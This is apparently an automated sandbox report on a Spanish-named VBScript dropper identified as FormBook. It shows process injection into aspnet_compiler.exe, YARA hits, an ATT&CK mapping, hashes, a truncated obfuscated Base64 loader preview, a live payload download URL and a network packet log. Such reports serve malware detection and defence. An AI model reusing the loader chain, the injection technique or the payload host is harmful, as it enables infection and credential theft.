Source: temp_executable.exe.1.dr, Program.cs	Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 102E008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user\AppData\Local\Temp\temp_executable.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe"			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 3.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Native API	221 Scripting	311 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	21 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
justificante de transferencia.vbs	11%	ReversingLabs	Script-WScript.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\temp_executable.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\temp_executable.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
transfer.adttemp.com.br	104.196.109.209	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://transfer.adttemp.com.br/2alBy/sirdeeeeee.txt	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://transfer.adttemp.com.br	temp_executable.exe, 00000002.00000002.2440570878.0000000002565000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	temp_executable.exe, 00000002.00000002.2440570878.0000000002547000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://transfer.adttemp.com.br	temp_executable.exe, 00000002.00000002.2440570878.0000000002547000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://transfer.adttemp.com.brl	temp_executable.exe, 00000002.00000002.2440570878.0000000002565000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.196.109.209	transfer.adttemp.com.br	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1524799
Start date and time:	2024-10-03 09:19:39 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	justificante de transferencia.vbs
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@5/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 28 Number of non-executed functions: 226
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: justificante de transferencia.vbs

Simulations

Behavior and APIs

Time	Type	Description
03:20:49	API Interceptor	1x Sleep call for process: temp_executable.exe modified
03:21:32	API Interceptor	3x Sleep call for process: aspnet_compiler.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Comprobante.lnk.lnk	Get hash	malicious	Lokibot	Browse	104.196.109.209
	08(2)_00.exe	Get hash	malicious	AgentTesla	Browse	104.196.109.209
	Hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.196.109.209
	hesaphareketi-01.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.196.109.209
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.196.109.209
	sostener.vbs	Get hash	malicious	Njrat	Browse	104.196.109.209
	sostener.vbs	Get hash	malicious	XWorm	Browse	104.196.109.209
	file.exe	Get hash	malicious	Unknown	Browse	104.196.109.209
	file.exe	Get hash	malicious	Unknown	Browse	104.196.109.209
	T3xpD9ZaYu.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	104.196.109.209

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	6.000443825136318
Encrypted:	false
SSDEEP:	1536:fRRsyiKY9KBgVlDpKw+P8sEAjL9P2M3CEF/7GmqbMY7usiY9hkF:p6xKY9KBgVlD8wmVZ9j7GmCMY7pdkF
MD5:	2A4E91A8185BC07992B63042C7A08059
SHA1:	534201922284D7D7900B806A4774D48651B2D55A
SHA-256:	FDEE5F40733E837080ADC800F8EDBBC2F6560E826868D2DB28DDB5AD4C47288C
SHA-512:	DB8D2CFFFB11D117F3F0FCE91EED4C37875CBB98060BED514DFFC377DD43C6F9657FACDA126D979D51CC6E97D0DF3DD77C662864138ABDF061D5BD20E83224A8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....}................................... ........@.. ....................................`.....................................K.... ............................................................................... ............... ..H............text...4.... ...................... ..`.sdata..............................@....rsrc........ ......................@..@.reloc...............V..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (65486), with CRLF line terminators
Entropy (8bit):	4.28092056011754
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	justificante de transferencia.vbs
File size:	331'311 bytes
MD5:	6a959a9276c026d279b40eedf42d93cb
SHA1:	7c7ef2838b5bce26ec80fa8c8becdd1b1242e5ae
SHA256:	a7a6b9a027fefdba700161804b4cdd67843534c5b34aeb341a491c895f1fbda8
SHA512:	8671af839ac1f57733605de862c36a38b0799488eab7cf96d0b23e8795fcbd1deaffb8ebd2e2b526d04b69c9dec8c064cb1d5da86d57e1f59378477e7b062ea7
SSDEEP:	3072:SMZKYE8MHHnndFmFMZKYE8MHHnndFmjmYp:tKXHHnXmWKXHHnXmjmYp
TLSH:	E464F723CF06591486830E7C8B4A5727BD6C49BCE2F5EFC4A6A7681048F8732656B7DC
File Content Preview:	' Main Script Logic for Processing Base64 Data....' Initialize the Base64-encoded string (Replace "));;;qQ@@@@M@@@@@@@@E@@@@@@@@//8@@@@Lg@@@@@@@@@@@@@@@@@@Q@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@g@@@@

File Icon


Icon Hash:	68d69b8f86ab9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:20:47.815135002 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:47.815188885 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:47.815304995 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:47.824624062 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:47.824666977 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:48.465909958 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:48.465996027 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:48.470074892 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:48.470091105 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:48.470422983 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:48.521068096 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:48.959614038 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.007411957 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.190700054 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.191008091 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.191099882 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.191126108 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.191181898 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.191689968 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.191698074 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.191735983 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.191767931 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.191773891 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.191817045 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.201739073 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.201855898 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.201869965 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.255579948 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.278870106 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.278879881 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.279043913 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.279258966 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.279267073 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.279326916 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.281054020 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.281089067 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.281117916 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.281138897 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.281150103 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.281174898 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.281199932 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.281883955 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.281959057 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.289534092 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.289652109 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.289750099 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.289813042 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.368387938 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.368556976 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.368841887 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.368880033 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.368921041 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.368933916 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.368980885 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.369781017 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.369815111 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.369860888 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.369865894 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.369905949 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.370368958 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.370435953 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.370946884 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.371006966 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.371098995 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.371160984 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.371833086 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.371925116 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.372009039 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.372071981 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.372859955 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.372931957 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.393809080 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.393954992 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.393980026 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.393985987 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.394035101 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.394520998 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.394603014 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.394630909 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.394675970 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.467459917 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.467654943 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.467685938 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.467730045 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.468465090 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.468544006 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.468558073 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.468601942 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.470591068 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.470684052 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.470709085 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.470781088 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.470837116 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.470846891 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.470968008 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.471025944 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.471035004 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.471623898 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.471708059 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.471716881 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.473783970 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.473881006 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.473902941 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.474019051 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.474076986 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.474087954 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.478615046 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.478708982 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.478729010 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.479726076 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.479803085 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.479808092 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.485146999 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.485239983 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.485245943 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.485977888 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.486051083 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.486056089 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.486185074 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.486249924 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.486254930 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.487045050 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.487123966 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.487128019 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.536845922 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.536880970 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556193113 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556278944 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556406975 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.556406975 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.556441069 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556704044 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556766987 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.556773901 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556809902 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556822062 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.556829929 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556874990 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.556875944 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556896925 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.556925058 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.556963921 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.557009935 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.557013988 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.557439089 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.557508945 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.557512999 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.557552099 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.557564020 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.557610035 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.558039904 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.558103085 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.558105946 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.558119059 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.558140993 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.558196068 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.558249950 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.558254004 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.558440924 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.558491945 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.558495998 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559058905 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559124947 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.559129000 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559143066 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559189081 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.559192896 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559344053 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559397936 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.559402943 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559437990 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559484959 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.559489965 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.559535980 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.570899010 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.571016073 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.571038961 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.571093082 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.571266890 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.571331024 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.571464062 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.571527958 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.571657896 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.571732044 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.571841955 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.571897030 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.571908951 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.571957111 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.571959019 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.571970940 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.572004080 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.572022915 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.573926926 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.574002981 CEST	49710	443	192.168.2.12	104.196.109.209
